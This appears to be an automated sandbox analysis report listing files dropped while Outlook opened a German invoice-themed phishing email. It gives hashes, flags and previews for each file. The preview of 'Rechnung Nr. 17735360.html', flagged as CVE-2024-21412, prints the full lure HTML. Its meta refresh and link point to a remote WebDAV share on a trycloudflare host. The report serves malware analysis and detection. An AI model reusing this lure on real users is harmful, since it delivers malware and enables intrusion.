                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):0.9884333009490953
                              Encrypted:false
                              SSDEEP:
                              MD5:3407CA7A3A376AC0FF0B29238AD5D63B
                              SHA1:F42A7130EB128C2A2035D5317A2B294FC4DE6620
                              SHA-256:62D46E8A9B968C1F051D2E3A66420337BE4EACAB747DEA141CED522ED2281E1A
                              SHA-512:9FCA7D0802CAE9F735D87FFD103ECC43996F193D7F824691CDA1096EDFB2882AC1A5A8BA30375AE9A926D512B73F5896267AE1112CC677EB63E18F99FB36355A
                              Malicious:false
                              Reputation:unknown
                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite Rollback Journal
                              Category:dropped
                              Size (bytes):8720
                              Entropy (8bit):1.3433727462690477
                              Encrypted:false
                              SSDEEP:
                              MD5:670D2353E0D09EF8AE1473A384D12748
                              SHA1:8A5602342C9D48F01A48A1BA1E217945AB324FA9
                              SHA-256:9FAD883A523314FD9BFE4F15714C55A840D63EE88C47E433B6713C813C70E3E5
                              SHA-512:6FD583C45EAB54DA3CBD4EA94B4C630FB01F18A5B06FD02FED1F94C2BA0B25828CDC77DBF975C64450D84662EA109D5E89FAB56CD92F00D3363BC1FFFFEAB568
                              Malicious:false
                              Reputation:unknown
                              Preview:.... .c.....s..]......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):231348
                              Entropy (8bit):4.3854202768299455
                              Encrypted:false
                              SSDEEP:
                              MD5:9664A6BA0ADA583FEC22AF54F539A413
                              SHA1:0477E8BCDDDE3DC6C569E778E5A7C3C3F64E46CC
                              SHA-256:3471106CC3AB0C6E75F21B40C31AA93E6CCF11F0F9065799BE1CCDFFBC436CA0
                              SHA-512:1D22989FD1BFF85B671F2CE8339B1238515C52FF7E2848002612E5F9A5BB8C00AF1F628F37390B4A9603255543809BCA005F96EBC2F3D9F2B57481B7A760DAEB
                              Malicious:false
                              Reputation:unknown
                              Preview:TH02...... .0.3........SM01X...,...`d%............IPM.Activity...........h...............h............H..h..?............h........ps..H..h\cal ...pDat...hH...0...X.?....h]..............h........_`Rk...h....@...I.lw...h....H...8.Wk...0....T...............d.........2h...............k..............!h.............. h.......p.?...#h....8.........$hps......8....."hP......P....'h..t...........1h]...<.........0h....4....Wk../h....h.....WkH..h...p.....?...-h .........?...+h.........?................. ..............F7..............FIPM.Activity.,nwForm....Standard...hJournal Entry..hIPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries......p..kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):322260
                              Entropy (8bit):4.000299760592446
                              Encrypted:false
                              SSDEEP:
                              MD5:CC90D669144261B198DEAD45AA266572
                              SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                              SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                              SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                              Malicious:false
                              Reputation:unknown
                              Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4

                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):10
                              Entropy (8bit):2.1219280948873624
                              Encrypted:false
                              SSDEEP:
                              MD5:B37B2E43E691841708611EC311141758
                              SHA1:66A58FE61FDB5D7ABF25AD7A502613BC888D87CF
                              SHA-256:06DDA3FDC266BA524FF34734C218D6B1EEEA94438552690B6CAAE6F216733D1F
                              SHA-512:FFF4EA3258481913DC4C04A113801CD310FB384CD87D7C9D785B8585A058CE02CB52F97FD42293D34ED8B8A14A353E8ADB2206FC1CBA24ECFF64EBAE8EAC8500
                              Malicious:false
                              Reputation:unknown
                              Preview:1722347242

                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D1267E3E-B98C-4B65-B33F-7D155A9B7D93

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):175399
                              Entropy (8bit):5.2881511035307796
                              Encrypted:false
                              SSDEEP:
                              MD5:BB9729AAD4B74A31F7308C417883BC5A
                              SHA1:09E1196B80415847E5995D9BEF8C4D9A379DC89E
                              SHA-256:19CB65EC1A6D1D15B1B64A816178726A772011D832E0FD57711A18E09C081513
                              SHA-512:94F9F539F26E523468597455392BDE7F705493D6851021E475C833E035618E1B7F0E249CAEA2FC73BECA921DD297F768F2D91F63D1B82086C6104B6553E5AD6B
                              Malicious:false
                              Reputation:unknown
                              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-07-30T13:47:19">.. Build: 16.0.17902.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

                              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):0.09304735440217722
                              Encrypted:false
                              SSDEEP:
                              MD5:D0DE7DB24F7B0C0FE636B34E253F1562
                              SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
                              SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
                              SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
                              Malicious:false
                              Reputation:unknown
                              Preview:SQLite format 3......@ ..........................................................................K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:SQLite Rollback Journal
                              Category:dropped
                              Size (bytes):4616
                              Entropy (8bit):0.13784977103055013
                              Encrypted:false
                              SSDEEP:
                              MD5:1313E680BDBA29F41797E3C0FEB74DC2
                              SHA1:A350485BEC1010B67817C2890332A0609AB2596E
                              SHA-256:D2725EC3C02C5D24FE67A84F223593B3E678CEAE3044F1EF68276308658041F9
                              SHA-512:3BA222B6CC4C555A1579C148324C18D23907C77D1AD9C5093221DAC67FF235D6CBEC362FC5A65E4E6CBE9B45F9E4E82AD3C9EBF8B6662EB88CBFE8FA2AC80ABD
                              Malicious:false
                              Reputation:unknown
                              Preview:.... .c...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):32768
                              Entropy (8bit):0.0445382698033491
                              Encrypted:false
                              SSDEEP:
                              MD5:4587FF2626FFBEF6399CFE664CA99C9B
                              SHA1:5D6AB5DE60A03576A04D77B64C0F455CB73ADF9A
                              SHA-256:1E11C1FF869530E3CA8E0464A31EF126430013EBCA652EEF3ABD44BF87C4F693
                              SHA-512:3EF1422F9B096236D69BCEBDF53C476B5FD0FD7706E17047CE95BE8FA018EAE1D512568D94DBD9B2AA8A7C1FB9CBDBB6060F939A8794BCEA05E8F352954DB1A3
                              Malicious:false
                              Reputation:unknown
                              Preview:..-.........................%U.K^./$..@.=...{...-.........................%U.K^./$..@.=...{.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:SQLite Write-Ahead Log, version 3007000
                              Category:dropped
                              Size (bytes):45352
                              Entropy (8bit):0.3960083008606082
                              Encrypted:false
                              SSDEEP:
                              MD5:48C5CC7913A23D71DA99A8DF6168EDFE
                              SHA1:48AED96CF051A0F1BB1526D7950CCC6A4EEEA8C7
                              SHA-256:04D837F8B0DA61F3F3662D9DBCDDCEB6BD3AA19E922DBDB0FD5B8F38F4B63685
                              SHA-512:7DA215D334E828E3173C177DD3DA81809B5DD99AE48E11A326EF55534835D16425634B498ED0891285DF676D823CB685D8905DEC8E745730887F37C9D8D17303
                              Malicious:false
                              Reputation:unknown
                              Preview:7....-..........^./$.....qud.:........^./$....{#?...SQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360 (002).html:Zone.Identifier (copy)

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:HTML document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:8BFE14ADBB0ADE34C12BDEB3D5DC53BE
                              SHA1:4FBF975E2B3A158313911DA0673BEEF71A3735D7
                              SHA-256:879A1F7527780796BEE71836B311DA4776C439B07CAAAC17C957D5CBD31F6627
                              SHA-512:ACA73CF9F0C8D8162171D221778FE2EA3BE73D019FBB0464B9AD9DF00990A3075D0078ED9BF4D8F9F1E51607878B76281AFDB1D3D5E10553EB62129553241228
                              Malicious:false
                              Reputation:unknown
                              Preview:<html>..<head> </head>..<body> ..<div id="in-page-channel-node-id" data-channel-name="in_page_channel_cnXeD0"> </div><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">..<link rel="icon" href="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png">....<meta property="og:image" content="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png"> .. <title>E_SCAN_DOC</title>.... <meta http-equiv="refresh" content="0; URL=search:query=E_SCAN_DOC&amp;crumb=location:\\string-neural-inspiration-polo.trycloudflare.com@SSL\DavWWWRoot\E_SCAN_DOC&amp;displayname=Downloads">.. .. .. .... <p><a href="search:query=E_SCAN_DOC&amp;crumb=location:\\string-neural-inspiration-polo.trycloudflare.com@SSL\DavWWWRoot\E_SCAN_DOC&amp;displayname=Downloads">E_SCAN_DOC </a></p>.. ....</body></html>

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:HTML document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):845
                              Entropy (8bit):5.367361341386086
                              Encrypted:false
                              SSDEEP:
                              MD5:8BFE14ADBB0ADE34C12BDEB3D5DC53BE
                              SHA1:4FBF975E2B3A158313911DA0673BEEF71A3735D7
                              SHA-256:879A1F7527780796BEE71836B311DA4776C439B07CAAAC17C957D5CBD31F6627
                              SHA-512:ACA73CF9F0C8D8162171D221778FE2EA3BE73D019FBB0464B9AD9DF00990A3075D0078ED9BF4D8F9F1E51607878B76281AFDB1D3D5E10553EB62129553241228
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_CVE_2024_21412, Description: Yara detected CVE-2024-21412, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html, Author: Joe Security
                              • Rule: JoeSecurity_CVE_2024_21412, Description: Yara detected CVE-2024-21412, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html, Author: Joe Security
                              • Rule: JoeSecurity_CVE_2024_21412, Description: Yara detected CVE-2024-21412, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html, Author: Joe Security
                              • Rule: JoeSecurity_CVE_2024_21412, Description: Yara detected CVE-2024-21412, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html, Author: Joe Security
                              • Rule: JoeSecurity_CVE_2024_21412, Description: Yara detected CVE-2024-21412, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html, Author: Joe Security
                              • Rule: JoeSecurity_CVE_2024_21412, Description: Yara detected CVE-2024-21412, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html, Author: Joe Security
                              Reputation:unknown
                              Preview:<html>..<head> </head>..<body> ..<div id="in-page-channel-node-id" data-channel-name="in_page_channel_cnXeD0"> </div><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">..<link rel="icon" href="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png">....<meta property="og:image" content="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png"> .. <title>E_SCAN_DOC</title>.... <meta http-equiv="refresh" content="0; URL=search:query=E_SCAN_DOC&amp;crumb=location:\\string-neural-inspiration-polo.trycloudflare.com@SSL\DavWWWRoot\E_SCAN_DOC&amp;displayname=Downloads">.. .. .. .... <p><a href="search:query=E_SCAN_DOC&amp;crumb=location:\\string-neural-inspiration-polo.trycloudflare.com@SSL\DavWWWRoot\E_SCAN_DOC&amp;displayname=Downloads">E_SCAN_DOC </a></p>.. ....</body></html>

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html:Zone.Identifier

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:
                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                              Malicious:false
                              Reputation:unknown
                              Preview:[ZoneTransfer]..ZoneId=3..

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{554CA542-0EC2-4B51-9F20-949A6D794E5F}.tmp

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:modified
                              Size (bytes):1536
                              Entropy (8bit):1.065261660548406
                              Encrypted:false
                              SSDEEP:
                              MD5:4F95B203E571E7198DD80C90FA374751
                              SHA1:9F33671805237F1D01DC2B881DD366E5284CC831
                              SHA-256:D8ACA821BE1745725E947404A76282B7FDC9385D87C751A8900F456A7A582204
                              SHA-512:420C1C2379DED0EED50AFCD832FAC39F5F9AA3D5C5E9683C0CD5236A039E0DA6C64961DEC520AC672F3E2FF1E0FBA4CF4712B3FA2F3D028E3FE622A804676AA3
                              Malicious:false
                              Reputation:unknown
                              Preview:....B.i.t.t.e. .b.e.a.c.h.t.e.n. .S.i.e. .d.i.e. .b.e.i.g.e.f...g.t.e. .b.e.z.a.h.l.t.e. .R.e.c.h.n.u.n.g.......V.i.e.l.e.n. .D.a.n.k. .f...r. .I.h.r. .G.e.s.c.h...f.t.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):9434
                              Entropy (8bit):4.928515784730612
                              Encrypted:false
                              SSDEEP:
                              MD5:D3594118838EF8580975DDA877E44DEB
                              SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                              SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                              SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                              Malicious:false
                              Reputation:unknown
                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):15828
                              Entropy (8bit):5.437953602506551
                              Encrypted:false
                              SSDEEP:
                              MD5:96E42EF8111CDF94A8E85E68455BAEA4
                              SHA1:9C2FD6AB5DAE68201AB137D1F0CD9D1E7FA11B7C
                              SHA-256:44BA40DE7E34AEBE5E0C0362F258FF3921E9408BC52F39D0F65FC174D2640EF1
                              SHA-512:8B2B6C0E4A8BF543A9D013F067D865BE9A82416F92999CC97B1A6957BCFBE98185D182D0E1CBEF0FE3241E33BD43DF6F2BB44434695D9C9AB30D400E0AAF0CE4
                              Malicious:false
                              Reputation:unknown
                              Preview:@...e...........`....................................@..........H...............o..b~.D.poM...C..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.2.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                              C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1722347237943303900_A9EEE0CC-1B29-481D-9411-8282059A6FCC.log

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:ASCII text, with very long lines (28727), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):0.15965441121721757
                              Encrypted:false
                              SSDEEP:
                              MD5:0EEE39C329E30F844F6003CECA6F1FAB
                              SHA1:CF5F6A1CD2DF0A72BC294958D10FE1B7D3E7845F
                              SHA-256:947BDEBA2C44FDC7C40130A947AF2197F81551607B385EF8548480BC7D15C0C5
                              SHA-512:33F0E2FB88F3D7A3CB1265AFB56F0B0D6A5BC5AC0EA3F46AC8CAA549F8D52DB8669D4C01C05DBB5CD81BF9979F1E0AA2E928F41181E6F3DC9748C472145EC9DC
                              Malicious:false
                              Reputation:unknown
                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..07/30/2024 13:47:17.995.OUTLOOK (0x1BC8).0x1BCC.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":21,"Time":"2024-07-30T13:47:17.995Z","Contract":"Office.System.Activity","Activity.CV":"zODuqSkbHUiUEYKCBZpvzA.4.9","Activity.Duration":15,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...07/30/2024 13:47:18.011.OUTLOOK (0x1BC8).0x1BCC.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":23,"Time":"2024-07-30T13:47:18.011Z","Contract":"Office.System.Activity","Activity.CV":"zODuqSkbHUiUEYKCBZpvzA.4.10","Activity.Duration":11091,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorV

                              C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1722347237944003300_A9EEE0CC-1B29-481D-9411-8282059A6FCC.log

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                              Malicious:false
                              Reputation:unknown
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\MSI8fe28.LOG

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):246
                              Entropy (8bit):3.5325285763919316
                              Encrypted:false
                              SSDEEP:
                              MD5:1560880D7A9EF02AF50C9128388B07E5
                              SHA1:2EB4E68DDD127AB0CDFB42985E3CBB0990ED7AC9
                              SHA-256:37D68C77E84F2C0C9C8104574A90A30AAD5C06FA13FDE6DB63255D5AFCF6C64E
                              SHA-512:33DE67171BF5084E1C73F7B35C100A1D41EE48C99C34F34B8408660515910C936B1833C3D62B16F31106E78E967683EA850BF223F3185586EC324AC0AABB20BB
                              Malicious:false
                              Reputation:unknown
                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .3.0./.0.7./.2.0.2.4. . .0.9.:.4.9.:.0.6. .=.=.=.....

                              C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240730T0947170725-7112.etl

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:modified
                              Size (bytes):94208
                              Entropy (8bit):4.470572756657578
                              Encrypted:false
                              SSDEEP:
                              MD5:E56098EEDE454DEB3FFD93E2BE66B33D
                              SHA1:10DE6516436D92C5BD7C5A30B70D4092BA5BC4AA
                              SHA-256:F91BFDDA2871C68CEA9336CEDB70DEDD1D466237765B274E6E6D855E853DA2A5
                              SHA-512:A542A69B3CCFF7D661E1DEC31DBCF930943C80EAFD0945A6ABBC88E8C3AE3CF1131217620108B73B76CC5EC17638CA011B14E28ED3B07CB762977697F42A53B0
                              Malicious:false
                              Reputation:unknown
                              Preview:............................................................................`...................................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................P...Y..........................v.2._.O.U.T.L.O.O.K.:.1.b.c.8.:.3.1.6.9.e.8.6.e.0.6.6.c.4.5.f.f.9.5.c.b.4.1.2.b.e.3.5.c.9.7.b.8...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.7.3.0.T.0.9.4.7.1.7.0.7.2.5.-.7.1.1.2...e.t.l.......P.P.........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5wkobk4.uzl.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:unknown
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-07-30 09-48-59-474.log

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:ASCII text, with very long lines (393)
                              Category:dropped
                              Size (bytes):16525
                              Entropy (8bit):5.353642815103214
                              Encrypted:false
                              SSDEEP:
